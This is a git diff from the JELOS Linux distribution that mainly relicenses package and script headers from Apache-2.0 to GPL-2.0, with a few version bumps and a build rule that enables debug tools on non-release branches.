(https://github.com/JustEnoughLinuxOS) # Simple script to watch the battery capacity and # turn the power LED orange when it reaches 20% and blinking green & orange at 10% diff --git a/packages/sysutils/system-utils/sources/devices/S922X/headphone_sense b/packages/sysutils/system-utils/sources/devices/S922X/headphone_sense index 1f31c0493..d5b5ed301 100644 --- a/packages/sysutils/system-utils/sources/devices/S922X/headphone_sense +++ b/packages/sysutils/system-utils/sources/devices/S922X/headphone_sense @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) # Source predefined functions and variables . /etc/profile diff --git a/packages/sysutils/system-utils/sources/scripts/bluetooth_sense b/packages/sysutils/system-utils/sources/scripts/bluetooth_sense index 955a6c46b..981f3104f 100755 --- a/packages/sysutils/system-utils/sources/scripts/bluetooth_sense +++ b/packages/sysutils/system-utils/sources/scripts/bluetooth_sense @@ -1,7 +1,7 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Source predefined functions and variables . /etc/profile diff --git a/packages/sysutils/system-utils/sources/scripts/fancontrol b/packages/sysutils/system-utils/sources/scripts/fancontrol index 711ad2bce..8d1fe0c50 100755 --- a/packages/sysutils/system-utils/sources/scripts/fancontrol +++ b/packages/sysutils/system-utils/sources/scripts/fancontrol @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) ### ### Fan Control now redirects to the quirk device/bin/fancontrol diff --git a/packages/sysutils/system-utils/sources/scripts/hdmi_sense b/packages/sysutils/system-utils/sources/scripts/hdmi_sense index 1222c5f78..c718f9211 100755 --- a/packages/sysutils/system-utils/sources/scripts/hdmi_sense +++ b/packages/sysutils/system-utils/sources/scripts/hdmi_sense @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Source predefined functions and variables . /etc/profile diff --git a/packages/sysutils/system-utils/sources/scripts/headphone_sense b/packages/sysutils/system-utils/sources/scripts/headphone_sense index 91e97442e..c7e0e472c 100755 --- a/packages/sysutils/system-utils/sources/scripts/headphone_sense +++ b/packages/sysutils/system-utils/sources/scripts/headphone_sense @@ -2,7 +2,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2020-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2021-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Source predefined functions and variables . /etc/profile diff --git a/packages/sysutils/system-utils/sources/scripts/ledcontrol b/packages/sysutils/system-utils/sources/scripts/ledcontrol index a29eae7c1..28be166eb 100755 --- a/packages/sysutils/system-utils/sources/scripts/ledcontrol +++ b/packages/sysutils/system-utils/sources/scripts/ledcontrol @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) ### ### LED Control now redirects to the quirk device/bin/ledcontrol diff --git a/packages/sysutils/system-utils/sources/scripts/volume_sense b/packages/sysutils/system-utils/sources/scripts/volume_sense index a87fa8e32..1def05f6a 100755 --- a/packages/sysutils/system-utils/sources/scripts/volume_sense +++ b/packages/sysutils/system-utils/sources/scripts/volume_sense @@ -1,6 +1,6 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2021-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # 2021-present pkegg . /etc/profile diff --git a/packages/sysutils/systemd/scripts/userconfig-setup b/packages/sysutils/systemd/scripts/userconfig-setup index fad543909..3ede19a5d 100755 --- a/packages/sysutils/systemd/scripts/userconfig-setup +++ b/packages/sysutils/systemd/scripts/userconfig-setup @@ -2,7 +2,7 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2017-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile.d/001-functions diff --git a/packages/sysutils/util-linux/package.mk b/packages/sysutils/util-linux/package.mk index f5ca14a85..aae8ae265 100644 --- a/packages/sysutils/util-linux/package.mk +++ b/packages/sysutils/util-linux/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="util-linux" PKG_VERSION="2.38.1" diff --git a/packages/sysutils/wget/package.mk b/packages/sysutils/wget/package.mk index bebd7148f..0927fbbe0 100644 --- a/packages/sysutils/wget/package.mk +++ b/packages/sysutils/wget/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="wget" PKG_VERSION="1.21.3" diff --git a/packages/textproc/bdf2psf/package.mk b/packages/textproc/bdf2psf/package.mk index d813423fe..e16e5567d 100644 --- a/packages/textproc/bdf2psf/package.mk +++ b/packages/textproc/bdf2psf/package.mk @@ -1,4 +1,4 @@ -# SPDX-License-Identifier: Apache-2.0 +# SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2023-present JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="bdf2psf" diff --git a/packages/textproc/dos2unix/package.mk b/packages/textproc/dos2unix/package.mk index e038704b2..0580adf97 100644 --- a/packages/textproc/dos2unix/package.mk +++ b/packages/textproc/dos2unix/package.mk @@ -1,4 +1,4 @@ -# SPDX-License-Identifier: Apache-2.0 +# SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2023-present JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="dos2unix" diff --git a/packages/textproc/libxml2/package.mk b/packages/textproc/libxml2/package.mk index 63c0b1db0..c8de3dcec 100644 --- a/packages/textproc/libxml2/package.mk +++ b/packages/textproc/libxml2/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="libxml2" PKG_VERSION="2.11.5" diff --git a/packages/textproc/libxslt/package.mk b/packages/textproc/libxslt/package.mk index 50435fd01..d2e24dbf5 100644 --- a/packages/textproc/libxslt/package.mk +++ b/packages/textproc/libxslt/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2018-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="libxslt" PKG_VERSION="1.1.38" diff --git a/packages/textproc/textviewer/package.mk b/packages/textproc/textviewer/package.mk index 9993face8..82b2e91a5 100644 --- a/packages/textproc/textviewer/package.mk +++ b/packages/textproc/textviewer/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2021-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="textviewer" PKG_VERSION="16d4c69" diff --git a/packages/textproc/yamlcpp/package.mk b/packages/textproc/yamlcpp/package.mk index 452f3bf9d..aeea8b145 100644 --- a/packages/textproc/yamlcpp/package.mk +++ b/packages/textproc/yamlcpp/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="yamlcpp" PKG_VERSION="f732014" diff --git a/packages/themes/es-theme-art-book-next/package.mk b/packages/themes/es-theme-art-book-next/package.mk index c3e8c0c0d..7412a3b56 100644 --- a/packages/themes/es-theme-art-book-next/package.mk +++ b/packages/themes/es-theme-art-book-next/package.mk @@ -1,10 +1,10 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2020 Shanti Gilbert (https://github.com/shantigilbert) # Copyright (C) 2020 351ELEC team (https://github.com/fewtarius/351ELEC) -# Copyright (C) 2021 Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="es-theme-art-book-next" -PKG_VERSION="b9979c32d9ba25a31b28e9ff159e8397ca0b307a" +PKG_VERSION="da0c1cb9f78b197b592c0f274c2a564ee2e248c0" PKG_ARCH="any" PKG_LICENSE="CUSTOM" PKG_SITE="https://github.com/anthonycaccese/art-book-next-jelos" diff --git a/packages/themes/es-theme-minielec/package.mk b/packages/themes/es-theme-minielec/package.mk index fcb7c2b3c..8f71ced19 100644 --- a/packages/themes/es-theme-minielec/package.mk +++ b/packages/themes/es-theme-minielec/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="es-theme-minielec" PKG_VERSION="364173dab15a77190b11a5e36966890468cad67c" diff --git a/packages/themes/es-theme-minimal/package.mk b/packages/themes/es-theme-minimal/package.mk index 42a26f6a0..499a6096e 100644 --- a/packages/themes/es-theme-minimal/package.mk +++ b/packages/themes/es-theme-minimal/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="es-theme-minimal" PKG_VERSION="b478b0e3986e557b40fcd25a9e48d9956fa11a96" diff --git a/packages/tools/coreutils/package.mk b/packages/tools/coreutils/package.mk index f43ab32f3..632be8fe9 100644 --- a/packages/tools/coreutils/package.mk +++ b/packages/tools/coreutils/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="coreutils" PKG_VERSION="9.3" diff --git a/packages/tools/dialog/package.mk b/packages/tools/dialog/package.mk index 99718bd84..56dc7f4c6 100644 --- a/packages/tools/dialog/package.mk +++ b/packages/tools/dialog/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="dialog" PKG_VERSION="1.3-20230209" diff --git a/packages/tools/empty/package.mk b/packages/tools/empty/package.mk index 3f9447229..22eea6f38 100644 --- a/packages/tools/empty/package.mk +++ b/packages/tools/empty/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="empty" PKG_VERSION="0.6.23c" diff --git a/packages/tools/freeimagelite/package.mk b/packages/tools/freeimagelite/package.mk index 78227589e..80770375a 100644 --- a/packages/tools/freeimagelite/package.mk +++ b/packages/tools/freeimagelite/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="freeimagelite" PKG_VERSION="4e00a1d" diff --git a/packages/tools/git/package.mk b/packages/tools/git/package.mk index be79469fe..69161077d 100644 --- a/packages/tools/git/package.mk +++ b/packages/tools/git/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="git" PKG_VERSION="2.42.0" diff --git a/packages/tools/grub/package.mk b/packages/tools/grub/package.mk index 7670143b5..54c8892dd 100755 --- a/packages/tools/grub/package.mk +++ b/packages/tools/grub/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2016-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="grub" PKG_VERSION="4fdcb339bbcfbf5c234c764c83813ab8de9c9657" diff --git a/packages/tools/jslisten/config/jslisten_profile b/packages/tools/jslisten/config/jslisten_profile index dfbd18a16..2d488c3aa 100644 --- a/packages/tools/jslisten/config/jslisten_profile +++ b/packages/tools/jslisten/config/jslisten_profile @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/os-release diff --git a/packages/tools/patchelf/package.mk b/packages/tools/patchelf/package.mk index df1a0f85c..6b465dad2 100644 --- a/packages/tools/patchelf/package.mk +++ b/packages/tools/patchelf/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2020-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="patchelf" PKG_VERSION="0.18.0" diff --git a/packages/tools/pyudev/package.mk b/packages/tools/pyudev/package.mk index dda8dc8fd..febf137ca 100644 --- a/packages/tools/pyudev/package.mk +++ b/packages/tools/pyudev/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 0riginally created by Escalade (https://github.com/escalade) # Copyright (C) 2018-present 5schatten (https://github.com/5schatten) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="pyudev" PKG_VERSION="5e00141" diff --git a/packages/tools/rkbin/package.mk b/packages/tools/rkbin/package.mk index ce989abfc..4977f7977 100644 --- a/packages/tools/rkbin/package.mk +++ b/packages/tools/rkbin/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0 -# Copyright (C) 2023-present BrooksyTech +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="rkbin" PKG_ARCH="arm aarch64" diff --git a/packages/tools/socat/package.mk b/packages/tools/socat/package.mk index f6210019e..d87c1bffb 100644 --- a/packages/tools/socat/package.mk +++ b/packages/tools/socat/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="socat" PKG_VERSION="1.7.4.4" diff --git a/packages/tools/vim/package.mk b/packages/tools/vim/package.mk index 226ffd940..3ad1d5fc0 100644 --- a/packages/tools/vim/package.mk +++ b/packages/tools/vim/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2016-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="vim" PKG_VERSION="9.0.1778" diff --git a/packages/ui/emulationstation/autostart/001-emulationstation b/packages/ui/emulationstation/autostart/001-emulationstation index ce6fd495f..d4e3560b2 100755 --- a/packages/ui/emulationstation/autostart/001-emulationstation +++ b/packages/ui/emulationstation/autostart/001-emulationstation @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Minimal OS variable loading for performance . /etc/profile.d/001-functions diff --git a/packages/ui/emulationstation/config/common/es_features.cfg b/packages/ui/emulationstation/config/common/es_features.cfg index afac062f9..0889436b2 100644 --- a/packages/ui/emulationstation/config/common/es_features.cfg +++ b/packages/ui/emulationstation/config/common/es_features.cfg @@ -123,11 +123,30 @@ + + + + + + + + + + + + + + + + + + + @@ -337,8 +356,9 @@ - - + + + diff --git a/packages/ui/emulationstation/package.mk b/packages/ui/emulationstation/package.mk index c8a2c32dc..52032dd84 100644 --- a/packages/ui/emulationstation/package.mk +++ b/packages/ui/emulationstation/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="emulationstation" PKG_VERSION="58a9a86aa957501753e7b2442efcbfb5dbdb9bac" diff --git a/packages/ui/emulationstation/sources/es_settings b/packages/ui/emulationstation/sources/es_settings index b995baaa3..3bcde7310 100755 --- a/packages/ui/emulationstation/sources/es_settings +++ b/packages/ui/emulationstation/sources/es_settings @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Source predefined functions and variables . /etc/profile diff --git a/packages/ui/emulationstation/sources/start_es.sh b/packages/ui/emulationstation/sources/start_es.sh index 5df56820e..76dac1cc6 100755 --- a/packages/ui/emulationstation/sources/start_es.sh +++ b/packages/ui/emulationstation/sources/start_es.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Source predefined functions and variables . /etc/profile diff --git a/packages/virtual/arm/package.mk b/packages/virtual/arm/package.mk index fc098dc1c..c757eaccc 100644 --- a/packages/virtual/arm/package.mk +++ b/packages/virtual/arm/package.mk @@ -1,8 +1,8 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022 - Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="arm" -PKG_LICENSE="Apache-2.0" +PKG_LICENSE="GPLv2" PKG_SITE="www.jelos.org" PKG_DEPENDS_TARGET="toolchain squashfs-tools:host dosfstools:host fakeroot:host kmod:host mtools:host populatefs:host libc gcc linux linux-drivers linux-firmware libusb unzip socat p7zip file SDL2 SDL2_gfx SDL2_image SDL2_mixer SDL2_net SDL2_ttf" PKG_SECTION="virtual" diff --git a/packages/virtual/docker/package.mk b/packages/virtual/docker/package.mk index b7a964889..380d5c06c 100644 --- a/packages/virtual/docker/package.mk +++ b/packages/virtual/docker/package.mk @@ -1,8 +1,8 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022 - Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="docker" -PKG_LICENSE="Apache-2.0" +PKG_LICENSE="GPLv2" PKG_SITE="www.jelos.org" PKG_SECTION="virtual" PKG_LONGDESC="Container support software metapackage." diff --git a/packages/virtual/emulators/autostart/001-controller b/packages/virtual/emulators/autostart/001-controller index 806cfa741..e6b350739 100755 --- a/packages/virtual/emulators/autostart/001-controller +++ b/packages/virtual/emulators/autostart/001-controller @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Minimal OS variable loading for performance . /etc/profile.d/001-functions diff --git a/packages/virtual/emulators/package.mk b/packages/virtual/emulators/package.mk index 0d34bedd5..01d2d9464 100644 --- a/packages/virtual/emulators/package.mk +++ b/packages/virtual/emulators/package.mk @@ -1,8 +1,8 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022 - Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="emulators" -PKG_LICENSE="Apache-2.0" +PKG_LICENSE="GPLv2" PKG_SITE="www.jelos.org" PKG_SECTION="emulation" # Do not change to virtual or makeinstall_target will not execute. PKG_LONGDESC="Emulation metapackage." diff --git a/packages/virtual/emulators/scripts/mkcontroller b/packages/virtual/emulators/scripts/mkcontroller index 56b208fa5..7f5662864 100755 --- a/packages/virtual/emulators/scripts/mkcontroller +++ b/packages/virtual/emulators/scripts/mkcontroller @@ -1,6 +1,6 @@ #!/bin/bash -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2020-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) TMPFILE=$(uuidgen) OUTFILE=$(uuidgen) diff --git a/packages/virtual/emulators/sources/Start CEMU.sh b/packages/virtual/emulators/sources/Start CEMU.sh index 3c7de3fb6..b2fe44d35 100755 --- a/packages/virtual/emulators/sources/Start CEMU.sh +++ b/packages/virtual/emulators/sources/Start CEMU.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) source /etc/profile diff --git a/packages/virtual/emulators/sources/Start HATARISA.sh b/packages/virtual/emulators/sources/Start HATARISA.sh index 5c58ed961..2a8e9dc07 100755 --- a/packages/virtual/emulators/sources/Start HATARISA.sh +++ b/packages/virtual/emulators/sources/Start HATARISA.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) source /etc/profile diff --git a/packages/virtual/emulators/sources/Start PCSX2.sh b/packages/virtual/emulators/sources/Start PCSX2.sh index 8e4eeff7d..f465e9f5d 100755 --- a/packages/virtual/emulators/sources/Start PCSX2.sh +++ b/packages/virtual/emulators/sources/Start PCSX2.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) source /etc/profile diff --git a/packages/virtual/emulators/sources/Start PPSSPP.sh b/packages/virtual/emulators/sources/Start PPSSPP.sh index 492d29e6d..9e8dbbe1b 100755 --- a/packages/virtual/emulators/sources/Start PPSSPP.sh +++ b/packages/virtual/emulators/sources/Start PPSSPP.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) source /etc/profile diff --git a/packages/virtual/emulators/sources/Start RPCS3.sh b/packages/virtual/emulators/sources/Start RPCS3.sh index 5a0939321..83a3a3614 100755 --- a/packages/virtual/emulators/sources/Start RPCS3.sh +++ b/packages/virtual/emulators/sources/Start RPCS3.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) source /etc/profile diff --git a/packages/virtual/emulators/sources/Start Xemu.sh b/packages/virtual/emulators/sources/Start Xemu.sh index 0e3eebc85..76f329981 100755 --- a/packages/virtual/emulators/sources/Start Xemu.sh +++ b/packages/virtual/emulators/sources/Start Xemu.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) source /etc/profile diff --git a/packages/virtual/emulators/sources/Start Yuzu.sh b/packages/virtual/emulators/sources/Start Yuzu.sh index 75f4dd998..ccc4a8181 100755 --- a/packages/virtual/emulators/sources/Start Yuzu.sh +++ b/packages/virtual/emulators/sources/Start Yuzu.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) source /etc/profile diff --git a/packages/virtual/emulators/tmpfiles.d/jelos-dirs.conf b/packages/virtual/emulators/tmpfiles.d/jelos-dirs.conf index 6fb5997da..81f731a36 100644 --- a/packages/virtual/emulators/tmpfiles.d/jelos-dirs.conf +++ b/packages/virtual/emulators/tmpfiles.d/jelos-dirs.conf @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2021-present 351ELEC (https://github.com/351ELEC) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) d /storage/roms 0777 root root - - d /tmp/cache 0777 root root - - diff --git a/packages/virtual/es-themes/package.mk b/packages/virtual/es-themes/package.mk index 599382425..e15b06c6c 100644 --- a/packages/virtual/es-themes/package.mk +++ b/packages/virtual/es-themes/package.mk @@ -1,8 +1,8 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022 - Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="es-themes" -PKG_LICENSE="Apache-2.0" +PKG_LICENSE="GPLv2" PKG_SITE="www.jelos.org" PKG_DEPENDS_TARGET="es-theme-art-book-next" PKG_SECTION="virtual" diff --git a/packages/virtual/gamesupport/package.mk b/packages/virtual/gamesupport/package.mk index 2b3ba95d9..02c6822a8 100644 --- a/packages/virtual/gamesupport/package.mk +++ b/packages/virtual/gamesupport/package.mk @@ -1,8 +1,8 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022 - Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="gamesupport" -PKG_LICENSE="Apache-2.0" +PKG_LICENSE="GPLv2" PKG_SITE="www.jelos.org" PKG_SECTION="virtual" PKG_LONGDESC="Game support software metapackage." diff --git a/packages/virtual/image/package.mk b/packages/virtual/image/package.mk index 3b5c00e93..55d11f701 100644 --- a/packages/virtual/image/package.mk +++ b/packages/virtual/image/package.mk @@ -46,6 +46,7 @@ else # Sound support [ "${PIPEWIRE_SUPPORT}" = "yes" ] && PKG_DEPENDS_TARGET+=" alsa pulseaudio pipewire wireplumber" + fi # Device is an emulation focused device @@ -54,6 +55,14 @@ fi # Add support for containers [ "${CONTAINER_SUPPORT}" = "yes" ] && PKG_DEPENDS_TARGET+=" ${PKG_TOOLS} docker" +### Unless we're building the release branch, build the debug tools. +BUILD_BRANCH="$(git branch --show-current)" +if [ ! "${BUILD_BRANCH}" = "main" ] && \ + [ -z "${DEBUG_SUPPORT}" ] +then + DEBUG_SUPPORT=yes +fi + [ "${DEBUG_SUPPORT}" = "yes" ] && PKG_DEPENDS_TARGET+=" ${PKG_DEBUG}" # 32Bit package support diff --git a/packages/virtual/misc-packages/package.mk b/packages/virtual/misc-packages/package.mk index 5d021e3a9..584f88547 100644 --- a/packages/virtual/misc-packages/package.mk +++ b/packages/virtual/misc-packages/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2018 Team LibreELEC (https://libreelec.tv) # Copyright (C) 2018-present Team CoreELEC (https://coreelec.org) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="misc-packages" PKG_VERSION="" diff --git a/packages/virtual/synctools/package.mk b/packages/virtual/synctools/package.mk index f7f80da8b..19d890312 100644 --- a/packages/virtual/synctools/package.mk +++ b/packages/virtual/synctools/package.mk @@ -1,8 +1,8 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022 - Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="synctools" -PKG_LICENSE="Apache-2.0" 